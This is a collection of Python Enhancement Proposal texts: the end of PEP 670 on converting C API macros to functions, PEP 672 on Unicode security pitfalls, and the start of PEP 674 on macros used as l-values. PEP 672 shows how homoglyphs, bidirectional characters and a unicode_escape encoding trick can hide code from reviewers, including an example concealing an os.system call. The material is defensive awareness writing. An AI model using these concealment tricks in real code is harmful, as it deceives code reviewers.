For example, the pos++ argument in the
PyUnicode_WRITE(kind, data, pos++, ch) code has a side effect.
This code is safe because the PyUnicode_WRITE() macro only uses its
3rd argument once and so does not duplicate pos++ side effect.
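To make the unsafe case concrete, here is a hedged sketch (the values array and the index i are made-up names):
/* Hedged sketch: Py_IS_NAN(X) expands to ((X) != (X)), so the argument
   expression is written out twice and the i++ side effect is duplicated
   (two unsequenced increments are in fact undefined behavior in C). */
double values[] = {1.0, 2.0, 3.0};
int i = 0;
if (Py_IS_NAN(values[i++])) {   /* i++ appears twice after expansion */
    /* never reached for these finite values */
}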
Misnesting
Example from bpo-43181: Python macros don’t shield arguments. The PyObject_TypeCheck()
macro before it was fixed:
#define PyObject_TypeCheck(ob, tp) \
(Py_IS_TYPE(ob, tp) || PyType_IsSubtype(Py_TYPE(ob), (tp)))
C++ usage example:
PyObject_TypeCheck(ob, U(f<a,b>(c)))
The preprocessor first expands it:
(Py_IS_TYPE(ob, f<a,b>(c)) || ...)
C++ "<" and ">" characters are not treated as brackets by the
preprocessor, so the Py_IS_TYPE() macro is invoked with 3 arguments:
ob
f<a
b>(c)
The compilation fails with an error on Py_IS_TYPE() which only takes
2 arguments.
The bug is that the ob and tp arguments of PyObject_TypeCheck()
must be put between parentheses: replace Py_IS_TYPE(ob, tp) with
Py_IS_TYPE((ob), (tp)). In regular C code, these parentheses are
redundant, can be seen as a bug, and so are often forgotten when writing
macros.
To avoid Macro Pitfalls, the PyObject_TypeCheck() macro has been
converted to a static inline function:
commit.
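A simplified, hedged sketch of that converted form (the actual CPython code differs slightly in naming and casting details):
/* Simplified sketch of the converted form. */
static inline int
_PyObject_TypeCheck(PyObject *ob, PyTypeObject *type)
{
    return Py_IS_TYPE(ob, type) || PyType_IsSubtype(Py_TYPE(ob), type);
}
#define PyObject_TypeCheck(ob, type) _PyObject_TypeCheck(_PyObject_CAST(ob), (type))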
Examples of hard to read macros
PyObject_INIT()
Example showing the usage of commas in a macro which has a return value.
Python 3.7 macro:
#define PyObject_INIT(op, typeobj) \
( Py_TYPE(op) = (typeobj), _Py_NewReference((PyObject *)(op)), (op) )
Python 3.8 function (simplified code):
static inline PyObject*
_PyObject_INIT(PyObject *op, PyTypeObject *typeobj)
{
Py_TYPE(op) = typeobj;
_Py_NewReference(op);
return op;
}
#define PyObject_INIT(op, typeobj) \
_PyObject_INIT(_PyObject_CAST(op), (typeobj))
The function doesn’t need the line continuation character "\".
It has an explicit "return op;" rather than the surprising
", (op)" syntax at the end of the macro.
It uses short statements on multiple lines, rather than being written
as a single long line.
Inside the function, the op argument has the well defined type
PyObject* and so doesn’t need casts like (PyObject *)(op).
Arguments don’t need to be put inside parentheses: use typeobj,
rather than (typeobj).
_Py_NewReference()
Example showing the usage of an #ifdef inside a macro.
Python 3.7 macro (simplified code):
#ifdef COUNT_ALLOCS
# define _Py_INC_TPALLOCS(OP) inc_count(Py_TYPE(OP))
# define _Py_COUNT_ALLOCS_COMMA ,
#else
# define _Py_INC_TPALLOCS(OP)
# define _Py_COUNT_ALLOCS_COMMA
#endif /* COUNT_ALLOCS */
#define _Py_NewReference(op) ( \
_Py_INC_TPALLOCS(op) _Py_COUNT_ALLOCS_COMMA \
Py_REFCNT(op) = 1)
Python 3.8 function (simplified code):
static inline void _Py_NewReference(PyObject *op)
{
_Py_INC_TPALLOCS(op);
Py_REFCNT(op) = 1;
}
PyUnicode_READ_CHAR()
This macro reuses arguments, and possibly calls PyUnicode_KIND multiple
times:
#define PyUnicode_READ_CHAR(unicode, index) \
(assert(PyUnicode_Check(unicode)), \
assert(PyUnicode_IS_READY(unicode)), \
(Py_UCS4) \
(PyUnicode_KIND((unicode)) == PyUnicode_1BYTE_KIND ? \
((const Py_UCS1 *)(PyUnicode_DATA((unicode))))[(index)] : \
(PyUnicode_KIND((unicode)) == PyUnicode_2BYTE_KIND ? \
((const Py_UCS2 *)(PyUnicode_DATA((unicode))))[(index)] : \
((const Py_UCS4 *)(PyUnicode_DATA((unicode))))[(index)] \
) \
))
Possible implementation as a static inline function:
static inline Py_UCS4
PyUnicode_READ_CHAR(PyObject *unicode, Py_ssize_t index)
{
assert(PyUnicode_Check(unicode));
assert(PyUnicode_IS_READY(unicode));
switch (PyUnicode_KIND(unicode)) {
case PyUnicode_1BYTE_KIND:
return (Py_UCS4)((const Py_UCS1 *)(PyUnicode_DATA(unicode)))[index];
case PyUnicode_2BYTE_KIND:
return (Py_UCS4)((const Py_UCS2 *)(PyUnicode_DATA(unicode)))[index];
case PyUnicode_4BYTE_KIND:
default:
return (Py_UCS4)((const Py_UCS4 *)(PyUnicode_DATA(unicode)))[index];
}
}
Macros converted to functions since Python 3.8
This is a list of macros already converted to functions between
Python 3.8 and Python 3.11.
Even though some converted macros (like Py_INCREF()) are very
commonly used by C extensions, these conversions did not significantly
impact Python performance and most of them didn’t break backward
compatibility.
Macros converted to static inline functions
Python 3.8:
Py_DECREF()
Py_INCREF()
Py_XDECREF()
Py_XINCREF()
PyObject_INIT()
PyObject_INIT_VAR()
_PyObject_GC_UNTRACK()
_Py_Dealloc()
Macros converted to regular functions
Python 3.9:
PyIndex_Check()
PyObject_CheckBuffer()
PyObject_GET_WEAKREFS_LISTPTR()
PyObject_IS_GC()
PyObject_NEW(): alias to PyObject_New()
PyObject_NEW_VAR(): alias to PyObjectVar_New()
To avoid performance slowdown on Python built without LTO,
private static inline functions have been added to the internal C API:
_PyIndex_Check()
_PyObject_IS_GC()
_PyType_HasFeature()
_PyType_IS_GC()
Static inline functions converted to regular functions
Python 3.11:
PyObject_CallOneArg()
PyObject_Vectorcall()
PyVectorcall_Function()
_PyObject_FastCall()
To avoid performance slowdown on Python built without LTO, a
private static inline function has been added to the internal C API:
_PyVectorcall_FunctionInline()
Incompatible changes
While the other converted macros didn’t break backward compatibility,
there is an exception.
The 3 macros Py_REFCNT(), Py_TYPE() and Py_SIZE() have been
converted to static inline functions in Python 3.10 and 3.11 to disallow
using them as l-value in assignment. It is an incompatible change made
on purpose: see bpo-39573 for
the rationale.
This PEP does not propose converting macros which can be used as l-value
to avoid introducing new incompatible changes.
Performance concerns and benchmarks
There have been concerns that converting macros to functions can degrade
performance.
This section explains performance concerns and shows benchmark results
using PR 29728, which
replaces the following static inline functions with macros:
PyObject_TypeCheck()
PyType_Check(), PyType_CheckExact()
PyType_HasFeature()
PyVectorcall_NARGS()
Py_DECREF(), Py_XDECREF()
Py_INCREF(), Py_XINCREF()
Py_IS_TYPE()
Py_NewRef()
Py_REFCNT(), Py_TYPE(), Py_SIZE()
The benchmarks were run on Fedora 35 (Linux) with GCC 11 on a laptop with 8
logical CPUs (4 physical CPU cores).
Static inline functions
First of all, converting macros to static inline functions has
negligible impact on performance: the measured differences are consistent
with noise due to unrelated factors.
Static inline functions are a new feature in the C99 standard. Modern C
compilers have efficient heuristics to decide if a function should be
inlined or not.
When a C compiler decides not to inline, there is likely a good reason.
For example, inlining may require reusing a register, forcing the register
value to be saved and restored on the stack, which increases stack memory
usage or is less efficient.
Benchmark of the ./python -m test -j5 command on Python built in
release mode with gcc -O3, LTO and PGO:
Macros (PR 29728): 361 sec +- 1 sec
Static inline functions (reference): 361 sec +- 1 sec
There is no significant performance difference between macros and
static inline functions when static inline functions are inlined.
Debug build
Performance in debug builds can suffer when macros are converted to
functions. This is compensated by better debuggability: debuggers can
retrieve function names, set breakpoints inside functions, etc.
On Windows, when Python is built in debug mode by Visual Studio, static
inline functions are not inlined.
On other platforms, ./configure --with-pydebug uses the -Og compiler
option on compilers that support it (including GCC and LLVM Clang).
-Og means “optimize debugging experience”.
Otherwise, the -O0 compiler option is used.
-O0 means “disable most optimizations”.
With GCC 11, gcc -Og can inline static inline functions, whereas
gcc -O0 does not inline static inline functions.
Benchmark of the ./python -m test -j10 command on Python built in
debug mode with gcc -O0 (that is, compiler optimizations,
including inlining, are explicitly disabled):
Macros (PR 29728): 345 sec ± 5 sec
Static inline functions (reference): 360 sec ± 6 sec
Replacing macros with static inline functions makes Python
1.04x slower when the compiler does not inline static inline
functions.
Note that benchmarks should not be run on a Python debug build.
Moreover, using link-time optimization (LTO) and profile-guided optimization
(PGO) is recommended for best performance and reliable benchmarks.
PGO helps the compiler to decide if functions should be inlined or not.
Force inlining
The Py_ALWAYS_INLINE macro can be used to force inlining. This macro
uses __attribute__((always_inline)) with GCC and Clang, and
__forceinline with MSC.
Previous attempts to use Py_ALWAYS_INLINE didn’t show any benefit, and were
abandoned. See for example bpo-45094
“Consider using __forceinline and __attribute__((always_inline)) on
static inline functions (Py_INCREF, Py_TYPE) for debug build”.
When the Py_INCREF() macro was converted to a static inline
function in 2018 (commit),
it was decided not to force inlining. The machine code was analyzed with
multiple C compilers and compiler options, and Py_INCREF() was always
inlined without having to force inlining. The only case where it was not
inlined was the debug build. See discussion in bpo-35059 “Convert Py_INCREF() and
PyObject_INIT() to inlined functions”.
Disabling inlining
On the other side, the Py_NO_INLINE macro can be used to disable
inlining. It can be used to reduce the stack memory usage, or to prevent
inlining on LTO+PGO builds, which generally inline code more aggressively:
see bpo-33720. The
Py_NO_INLINE macro uses __attribute__ ((noinline)) with GCC and
Clang, and __declspec(noinline) with MSC.
This technique is available, though we currently don’t know a concrete
function for which it would be useful.
Note that with macros, it is not possible to disable inlining at all.
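A hedged sketch of how such an annotation is applied (the function name and body are made up):
/* Hedged sketch: 'report_fatal_error' is a made-up name.  Py_NO_INLINE
   asks the compiler not to inline the function, for example to keep a
   rarely-taken slow path out of its callers and reduce their stack usage. */
static Py_NO_INLINE void
report_fatal_error(const char *msg)
{
    PyErr_SetString(PyExc_RuntimeError, msg);
}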
Rejected Ideas
Keep macros, but fix some macro issues
Macros are always “inlined” with any C compiler.
The duplication of side effects can be worked around in the caller of
the macro.
People using macros should be considered “consenting adults”. People who
feel unsafe with macros should simply not use them.
These ideas are rejected because macros are error prone, and it is too easy
to miss a macro pitfall when writing and reviewing macro code. Moreover, macros
are harder to read and maintain than functions.
Post History
python-dev mailing list threads:
Version 2 of PEP 670 - Convert macros to functions in the Python C API
(February 2022)
Steering Council reply to PEP 670 – Convert macros to
functions in the Python C API
(February 2022)
PEP 670: Convert macros to functions in the Python C API
(October 2021)
References
bpo-45490:
[C API] PEP 670: Convert macros to functions in the Python C API
(October 2021).
What to do with unsafe macros
(March 2021).
bpo-43502:
[C-API] Convert obvious unsafe macros to static inline functions
(March 2021).
Version History
Version 2:
Stricter policy on not changing argument types and return type.
Better explain why pointer arguments require a cast to not emit new
compiler warnings.
Macros which can be used as l-values are no longer modified by the
PEP.
Macros having multiple return types are no longer modified by the
PEP.
Limited C API version 3.11 no longer casts pointer arguments.
No longer remove return values of macros “which should not have a
return value”.
Add “Macros converted to functions since Python 3.8” section.
Add “Benchmark comparing macros and static inline functions”
section.
Version 1: First public version
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Final | PEP 670 – Convert macros to functions in the Python C API | Standards Track | Macros in the C API will be converted to static inline functions or
regular functions. This will help avoid macro pitfalls in C/C++, and
make the functions usable from other programming languages. |
PEP 672 – Unicode-related Security Considerations for Python
Author:
Petr Viktorin <encukou at gmail.com>
Status:
Active
Type:
Informational
Created:
01-Nov-2021
Post-History:
01-Nov-2021
Table of Contents
Abstract
Introduction
Acknowledgement
Confusing Features
ASCII-only Considerations
Confusables and Typos
Control Characters
Confusable Characters in Identifiers
Confusable Digits
Bidirectional Text
Bidirectional Marks, Embeddings, Overrides and Isolates
Normalizing identifiers
Source Encoding
Open Issues
References
Copyright
Abstract
This document explains possible ways to misuse Unicode to write Python
programs that appear to do something other than what they actually do.
This document does not give any recommendations or solutions.
Introduction
Unicode is a system for handling all kinds of written language.
It aims to allow any character from any human language to be
used. Python code may consist of almost all valid Unicode characters.
While this allows programmers from all around the world to express themselves,
it also allows writing code that is potentially confusing to readers.
It is possible to misuse Python’s Unicode-related features to write code that
appears to do something other than what it does.
Evildoers could take advantage of this to trick code reviewers into
accepting malicious code.
The possible issues generally can’t be solved in Python itself without
excessive restrictions of the language.
They should be solved in code editors and review tools
(such as diff displays), by enforcing project-specific policies,
and by raising awareness of individual programmers.
This document purposefully does not give any solutions
or recommendations: it is rather a list of things to keep in mind.
This document is specific to Python.
For general security considerations in Unicode text, see [tr36] and [tr39].
Acknowledgement
Investigation for this document was prompted by CVE-2021-42574,
Trojan Source Attacks, reported by Nicholas Boucher and Ross Anderson,
which focuses on Bidirectional override characters and homoglyphs in a variety
of programming languages.
Confusing Features
This section lists some Unicode-related features that can be surprising
or misusable.
ASCII-only Considerations
ASCII is a subset of Unicode, consisting of the most common symbols, numbers,
Latin letters and control characters.
While issues with the ASCII character set are generally well understood,
they’re presented here to help better understand the non-ASCII cases.
Confusables and Typos
Some characters look alike.
Before the age of computers, many mechanical typewriters lacked the keys for
the digits 0 and 1: users typed O (capital o) and l
(lowercase L) instead. Human readers could tell them apart by context only.
In programming languages, however, distinction between digits and letters is
critical – and most fonts designed for programmers make it easy to tell them
apart.
Similarly, in fonts designed for human languages, the uppercase “I” and
lowercase “l” can look similar. Or the letters “rn” may be virtually
indistinguishable from the single letter “m”.
Again, programmers’ fonts make these pairs of confusables
noticeably different.
However, what is “noticeably” different always depends on the context.
Humans tend to ignore details in longer identifiers: the variable name
accessibi1ity_options can still look indistinguishable from
accessibility_options, while they are distinct for the compiler.
The same can be said for plain typos: most humans will not notice the typo in
responsbility_chain_delegate.
Control Characters
Python generally considers all CR (\r), LF (\n), and CR-LF
pairs (\r\n) as end-of-line characters.
Most code editors do as well, but there are editors that display “non-native”
line endings as unknown characters (or nothing at all), rather than ending
the line, displaying this example:
# Don't call this function:
fire_the_missiles()
as a harmless comment like:
# Don't call this function:⬛fire_the_missiles()
CPython may treat the control character NUL (\0) as end of input,
but many editors simply skip it, possibly showing code that Python will not
run as a regular part of a file.
Some characters can be used to hide/overwrite other characters when source is
listed in common terminals. For example:
BS (\b, Backspace) moves the cursor back, so the character after it
will overwrite the character before.
CR (\r, carriage return) moves the cursor to the start of line,
subsequent characters overwrite the start of the line.
SUB (\x1A, Ctrl+Z) means “End of text” on Windows. Some programs
(such as type) ignore the rest of the file after it.
ESC (\x1B) commonly initiates escape codes which allow arbitrary
control of the terminal.
Confusable Characters in Identifiers
Python is not limited to ASCII.
It allows characters of all scripts – Latin letters to ancient Egyptian
hieroglyphs – in identifiers (such as variable names).
See PEP 3131 for details and rationale.
Only “letters and numbers” are allowed, so while γάτα is a valid Python
identifier, 🐱 is not. (See Identifiers and keywords for details.)
Non-printing control characters are also not allowed in identifiers.
However, within the allowed set there is a large number of “confusables”.
For example, the uppercase versions of the Latin b, Greek β (Beta), and
Cyrillic в (Ve) often look identical: B, Β and В, respectively.
This allows identifiers that look the same to humans, but not to Python.
For example, all of the following are distinct identifiers:
scope (Latin, ASCII-only)
scоpe (with a Cyrillic о)
scοpe (with a Greek ο)
ѕсоре (all Cyrillic letters)
Additionally, some letters can look like non-letters:
The letter for the Hawaiian ʻokina looks like an apostrophe;
ʻHelloʻ is a Python identifier, not a string.
The East Asian word for ten looks like a plus sign,
so 十 = 10 is a complete Python statement. (The “十” is a word: “ten”
rather than “10”.)
Note
The converse also applies – some symbols look like letters – but since
Python does not allow arbitrary symbols in identifiers, this is not an
issue.
Confusable Digits
Numeric literals in Python only use the ASCII digits 0-9 (and non-digits such
as . or e).
However, when numbers are converted from strings, such as in the int and
float constructors or by the str.format method, any decimal digit
can be used. For example ߅ (NKO DIGIT FIVE) or ௫
(TAMIL DIGIT FIVE) work as the digit 5.
Some scripts include digits that look similar to ASCII ones, but have a
different value. For example:
>>> int('৪୨')
42
>>> '{٥}'.format('zero', 'one', 'two', 'three', 'four', 'five')
five
Bidirectional Text
Some scripts, such as Hebrew or Arabic, are written right-to-left.
Phrases in such scripts interact with nearby text in ways that can be
surprising to people who aren’t familiar with these writing systems and their
computer representation.
The exact process is complicated, and explained in Unicode Standard Annex #9,
Unicode Bidirectional Algorithm.
Consider the following code, which assigns a 100-character string to
the variable s:
s = "X" * 100 # "X" is assigned
When the X is replaced by the Hebrew letter א, the line becomes:
s = "א" * 100 # "א" is assigned
This command still assigns a 100-character string to s, but
when displayed as general text following the Bidirectional Algorithm
(e.g. in a browser), it appears as s = "א" followed by a comment.
Other surprising examples include:
In the statement ערך = 23, the variable ערך is set to the integer 23.
In the statement قيمة = ערך, the variable قيمة is set
to the value of ערך.
In the statement قيمة - (ערך ** 2), the value of ערך is squared and
then subtracted from قيمة.
The opening parenthesis is displayed as ).
Bidirectional Marks, Embeddings, Overrides and Isolates
Default reordering rules do not always yield the intended direction of text, so
Unicode provides several ways to alter it.
The most basic are directional marks, which are invisible but affect text
as a left-to-right (or right-to-left) character would.
Continuing with the s = "X" example above, in the next example the X is
replaced by the Latin x followed or preceded by a
right-to-left mark (U+200F). This assigns a 200-character string to s
(100 copies of x interspersed with 100 invisible marks),
but under Unicode rules for general text, it is rendered as s = "x"
followed by an ASCII-only comment:
s = "x" * 100 # "x" is assigned
The directional embedding, override and isolate characters
are also invisible, but affect the ordering of all text after them until either
ended by a dedicated character, or until the end of line.
(Unicode specifies the effect to last until the end of a “paragraph” (see
Unicode Bidirectional Algorithm),
but allows tools to interpret newline characters as paragraph ends
(see Unicode Newline Guidelines). Most code editors and terminals do so.)
These characters essentially allow arbitrary reordering of the text that
follows them. Python only allows them in strings and comments, which does limit
their potential (especially in combination with the fact that Python’s comments
always extend to the end of a line), but it doesn’t render them harmless.
Normalizing identifiers
Python strings are collections of Unicode codepoints, not “characters”.
For reasons like compatibility with earlier encodings, Unicode often has
several ways to encode what is essentially a single “character”.
For example, all these are different ways of writing Å as a Python string,
each of which is unequal to the others.
"\N{LATIN CAPITAL LETTER A WITH RING ABOVE}" (1 codepoint)
"\N{LATIN CAPITAL LETTER A}\N{COMBINING RING ABOVE}" (2 codepoints)
"\N{ANGSTROM SIGN}" (1 codepoint, but different)
For another example, the ligature ﬁ has a dedicated Unicode codepoint,
even though it has the same meaning as the two letters fi.
Also, common letters frequently have several distinct variations.
Unicode provides them for contexts where the difference has some semantic
meaning, like mathematics. For example, some variations of n are:
n (LATIN SMALL LETTER N)
𝐧 (MATHEMATICAL BOLD SMALL N)
𝘯 (MATHEMATICAL SANS-SERIF ITALIC SMALL N)
n (FULLWIDTH LATIN SMALL LETTER N)
ⁿ (SUPERSCRIPT LATIN SMALL LETTER N)
Unicode includes algorithms to normalize variants like these to a single
form, and Python identifiers are normalized.
(There are several normal forms; Python uses NFKC.)
For example, xn and xⁿ are the same identifier in Python:
>>> xⁿ = 8
>>> xn
8
… as are ﬁ and fi, and the different ways to encode Å.
This normalization applies only to identifiers, however.
Functions that treat strings as identifiers, such as getattr,
do not perform normalization:
>>> class Test:
...     def ﬁnalize(self):
...         print('OK')
...
>>> Test().ﬁnalize()
OK
>>> Test().finalize()
OK
>>> getattr(Test(), 'ﬁnalize')
Traceback (most recent call last):
...
AttributeError: 'Test' object has no attribute 'ﬁnalize'
This also applies when importing:
import ﬁnalization performs normalization, and looks for a file
named finalization.py (and other finalization.* files).
importlib.import_module("ﬁnalization") does not normalize,
so it looks for a file named ﬁnalization.py.
Some filesystems independently apply normalization and/or case folding.
On some systems, finalization.py, ﬁnalization.py and
FINALIZATION.py are three distinct filenames; on others, some or all
of these name the same file.
Source Encoding
The encoding of Python source files is given by a specific regex on the first
two lines of a file, as per Encoding declarations.
This mechanism is very liberal in what it accepts, and thus easy to obfuscate.
This can be misused in combination with Python-specific special-purpose
encodings (see Text Encodings).
For example, with encoding: unicode_escape, characters like
quotes or braces can be hidden in an (f-)string, with many tools (syntax
highlighters, linters, etc.) considering them part of the string.
For example:
# For writing Japanese, you don't need an editor that supports
# UTF-8 source encoding: unicode_escape sequences work just as well.
import os
message = '''
This is "Hello World" in Japanese:
\u3053\u3093\u306b\u3061\u306f\u7f8e\u3057\u3044\u4e16\u754c
This runs `echo WHOA` in your shell:
\u0027\u0027\u0027\u002c\u0028\u006f\u0073\u002e
\u0073\u0079\u0073\u0074\u0065\u006d\u0028
\u0027\u0065\u0063\u0068\u006f\u0020\u0057\u0048\u004f\u0041\u0027
\u0029\u0029\u002c\u0027\u0027\u0027
'''
Here, encoding: unicode_escape in the initial comment is an encoding
declaration. The unicode_escape encoding instructs Python to treat
\u0027 as a single quote (which can start/end a string), \u002c as
a comma (punctuator), etc.
Open Issues
We should probably write and publish:
Recommendations for Text Editors and Code Tools
Recommendations for Programmers and Teams
Possible Improvements in Python
References
[tr36]
Unicode Technical Report #36: Unicode Security Considerations
http://www.unicode.org/reports/tr36/
[tr39]
Unicode® Technical Standard #39: Unicode Security Mechanisms
http://www.unicode.org/reports/tr39/
Copyright
This document is placed in the public domain or under the
CC0-1.0-Universal license, whichever is more permissive.
| Active | PEP 672 – Unicode-related Security Considerations for Python | Informational | This document explains possible ways to misuse Unicode to write Python
programs that appear to do something else than they actually do. |
PEP 674 – Disallow using macros as l-values
Author:
Victor Stinner <vstinner at python.org>
Status:
Deferred
Type:
Standards Track
Created:
30-Nov-2021
Python-Version:
3.12
Table of Contents
Abstract
PEP Deferral
Rationale
Using a macro as an l-value
CPython nogil fork
HPy project
GraalVM Python
Specification
Disallow using macros as l-values
PyObject and PyVarObject macros
GET macros
AS macros
PyUnicode macros
PyDateTime GET macros
Port C extensions to Python 3.11
PyTuple_GET_ITEM() and PyList_GET_ITEM() are left unchanged
PyDescr_NAME() and PyDescr_TYPE() are left unchanged
Implementation
Py_TYPE() and Py_SIZE() macros
Backwards Compatibility
Statistics
Top 5000 PyPI
Other affected projects
Relationship with the HPy project
The HPy project
The C API is here to stay for a few more years
Rejected Idea: Leave the macros as they are
Macros already modified
Post History
References
Version History
Copyright
Abstract
Disallow using macros as l-values. For example,
Py_TYPE(obj) = new_type now fails with a compiler error.
In practice, the majority of affected projects only have to make two
changes:
Replace Py_TYPE(obj) = new_type
with Py_SET_TYPE(obj, new_type).
Replace Py_SIZE(obj) = new_size
with Py_SET_SIZE(obj, new_size).
PEP Deferral
See SC reply to PEP 674 – Disallow using macros as l-values
(February 2022).
Rationale
Using a macro as an l-value
In the Python C API, some functions are implemented as macros because
writing a macro is simpler than writing a regular function. If a macro
directly exposes a structure member, it is technically possible to use
this macro not only to get the structure member but also to set it.
Example with the Python 3.10 Py_TYPE() macro:
#define Py_TYPE(ob) (((PyObject *)(ob))->ob_type)
This macro can be used as a r-value to get an object type:
type = Py_TYPE(object);
It can also be used as an l-value to set an object type:
Py_TYPE(object) = new_type;
It is also possible to set an object reference count and an object size
using Py_REFCNT() and Py_SIZE() macros.
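For illustration, the l-value pattern in question looks like this (with the setter alternatives shown as comments):
/* Illustrative only: this l-value pattern relies on CPython internals. */
Py_REFCNT(object) = new_refcnt;   /* instead: Py_SET_REFCNT(object, new_refcnt) */
Py_SIZE(object) = new_size;       /* instead: Py_SET_SIZE(object, new_size) */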
Setting an object attribute directly like this relies on the exact
current CPython implementation. Implementing this feature in other Python
implementations can make their C API implementation less efficient.
CPython nogil fork
Sam Gross forked Python 3.9 to remove the GIL: the nogil branch. This fork has no
PyObject.ob_refcnt member, but a more elaborate implementation for
reference counting, and so the Py_REFCNT(obj) = new_refcnt; code
fails with a compiler error.
Merging the nogil fork into the upstream CPython main branch requires
first to fix this C API compatibility issue. It is a concrete example of
a Python optimization blocked indirectly by the C API.
This issue was already fixed in Python 3.10: the Py_REFCNT() macro
has been already modified to disallow using it as an l-value.
These statements are endorsed by Sam Gross (nogil developer).
HPy project
The HPy project is a brand new C API for
Python using only handles and function calls: handles are opaque,
structure members cannot be accessed directly, and pointers cannot be
dereferenced.
Searching and replacing Py_SET_SIZE() is easier and safer than
searching and replacing some strange macro uses of Py_SIZE().
Py_SIZE() can be semi-mechanically replaced by HPy_Length(),
whereas seeing Py_SET_SIZE() would immediately make clear that the
code needs bigger changes in order to be ported to HPy (for example by
using HPyTupleBuilder or HPyListBuilder).
The fewer internal details exposed via macros, the easier it will be for
HPy to provide direct equivalents. Any macro that references
“non-public” interfaces effectively exposes those interfaces publicly.
These statements are endorsed by Antonio Cuni (HPy developer).
GraalVM Python
In GraalVM, when a Python object is accessed by the Python C API, the C API
emulation layer has to wrap the GraalVM objects into wrappers that expose
the internal structure of the CPython structures (PyObject, PyLongObject,
PyTypeObject, etc). This is because when the C code accesses it directly or via
macros, all GraalVM can intercept is a read at the struct offset, which has
to be mapped back to the representation in GraalVM. The smaller the
“effective” number of exposed struct members (by replacing macros with
functions), the simpler GraalVM wrappers can be.
This PEP alone is not enough to get rid of the wrappers in GraalVM, but it
is a step towards this long term goal. GraalVM already supports HPy which is a better
solution in the long term.
These statements are endorsed by Tim Felgentreff (GraalVM Python developer).
Specification
Disallow using macros as l-values
The following 65 macros are modified to disallow using them as l-values.
PyObject and PyVarObject macros
Py_TYPE(): Py_SET_TYPE() must be used instead
Py_SIZE(): Py_SET_SIZE() must be used instead
GET macros
PyByteArray_GET_SIZE()
PyBytes_GET_SIZE()
PyCFunction_GET_CLASS()
PyCFunction_GET_FLAGS()
PyCFunction_GET_FUNCTION()
PyCFunction_GET_SELF()
PyCell_GET()
PyCode_GetNumFree()
PyDict_GET_SIZE()
PyFunction_GET_ANNOTATIONS()
PyFunction_GET_CLOSURE()
PyFunction_GET_CODE()
PyFunction_GET_DEFAULTS()
PyFunction_GET_GLOBALS()
PyFunction_GET_KW_DEFAULTS()
PyFunction_GET_MODULE()
PyHeapType_GET_MEMBERS()
PyInstanceMethod_GET_FUNCTION()
PyList_GET_SIZE()
PyMemoryView_GET_BASE()
PyMemoryView_GET_BUFFER()
PyMethod_GET_FUNCTION()
PyMethod_GET_SELF()
PySet_GET_SIZE()
PyTuple_GET_SIZE()
PyUnicode_GET_DATA_SIZE()
PyUnicode_GET_LENGTH()
PyUnicode_GET_LENGTH()
PyUnicode_GET_SIZE()
PyWeakref_GET_OBJECT()
AS macros
PyByteArray_AS_STRING()
PyBytes_AS_STRING()
PyFloat_AS_DOUBLE()
PyUnicode_AS_DATA()
PyUnicode_AS_UNICODE()
PyUnicode macros
PyUnicode_1BYTE_DATA()
PyUnicode_2BYTE_DATA()
PyUnicode_4BYTE_DATA()
PyUnicode_DATA()
PyUnicode_IS_ASCII()
PyUnicode_IS_COMPACT()
PyUnicode_IS_READY()
PyUnicode_KIND()
PyUnicode_READ()
PyUnicode_READ_CHAR()
PyDateTime GET macros
PyDateTime_DATE_GET_FOLD()
PyDateTime_DATE_GET_HOUR()
PyDateTime_DATE_GET_MICROSECOND()
PyDateTime_DATE_GET_MINUTE()
PyDateTime_DATE_GET_SECOND()
PyDateTime_DATE_GET_TZINFO()
PyDateTime_DELTA_GET_DAYS()
PyDateTime_DELTA_GET_MICROSECONDS()
PyDateTime_DELTA_GET_SECONDS()
PyDateTime_GET_DAY()
PyDateTime_GET_MONTH()
PyDateTime_GET_YEAR()
PyDateTime_TIME_GET_FOLD()
PyDateTime_TIME_GET_HOUR()
PyDateTime_TIME_GET_MICROSECOND()
PyDateTime_TIME_GET_MINUTE()
PyDateTime_TIME_GET_SECOND()
PyDateTime_TIME_GET_TZINFO()
Port C extensions to Python 3.11
In practice, the majority of projects affected by this PEP only have to
make two changes:
Replace Py_TYPE(obj) = new_type
with Py_SET_TYPE(obj, new_type).
Replace Py_SIZE(obj) = new_size
with Py_SET_SIZE(obj, new_size).
The pythoncapi_compat project can be used to
automatically update C extensions: add Python 3.11 support without
losing support for older Python versions. The project provides a header
file which provides Py_SET_REFCNT(), Py_SET_TYPE() and
Py_SET_SIZE() functions to Python 3.8 and older.
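For projects that do not want to depend on that header, a minimal hedged sketch of such a shim could look as follows (simplified; the _compat_* helper names are made up, and the real header covers more versions and corner cases):
/* Hedged, simplified sketch of a compatibility shim; the pythoncapi_compat
   header provides a complete, tested version. */
#if PY_VERSION_HEX < 0x03090000 && !defined(Py_SET_TYPE)
static inline void _compat_Py_SET_TYPE(PyObject *ob, PyTypeObject *type)
{ ob->ob_type = type; }
#define Py_SET_TYPE(ob, type) _compat_Py_SET_TYPE((PyObject*)(ob), (type))
#endif
#if PY_VERSION_HEX < 0x03090000 && !defined(Py_SET_SIZE)
static inline void _compat_Py_SET_SIZE(PyVarObject *ob, Py_ssize_t size)
{ ob->ob_size = size; }
#define Py_SET_SIZE(ob, size) _compat_Py_SET_SIZE((PyVarObject*)(ob), (size))
#endif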
PyTuple_GET_ITEM() and PyList_GET_ITEM() are left unchanged
The PyTuple_GET_ITEM() and PyList_GET_ITEM() macros are left
unchanged.
The code patterns &PyTuple_GET_ITEM(tuple, 0) and
&PyList_GET_ITEM(list, 0) are still commonly used to get access to
the inner PyObject** array.
Changing these macros is out of the scope of this PEP.
PyDescr_NAME() and PyDescr_TYPE() are left unchanged
The PyDescr_NAME() and PyDescr_TYPE() macros are left unchanged.
These macros give access to PyDescrObject.d_name and
PyDescrObject.d_type members. They can be used as l-values to set
these members.
The SWIG project uses these macros as l-values to set these members. It
would be possible to modify SWIG to prevent setting PyDescrObject
structure members directly, but it is not really worth it since the
PyDescrObject structure is not performance critical and is unlikely
to change soon.
See the bpo-46538 “[C API] Make
the PyDescrObject structure opaque: PyDescr_NAME() and PyDescr_TYPE()”
issue for more details.
Implementation
The implementation is tracked by bpo-45476: [C API] PEP 674: Disallow
using macros as l-values.
Py_TYPE() and Py_SIZE() macros
In May 2020, the Py_TYPE() and Py_SIZE() macros have been
modified to disallow using them as l-values (Py_TYPE,
Py_SIZE).
In November 2020, the change was reverted,
since it broke too many third party projects.
In June 2021, once most third party projects were updated, a second
attempt
was done, but had to be reverted again
, since it broke test_exceptions on Windows.
In September 2021, once test_exceptions has been fixed,
Py_TYPE() and Py_SIZE() were finally changed.
In November 2021, this backward incompatible change got a
Steering Council exception.
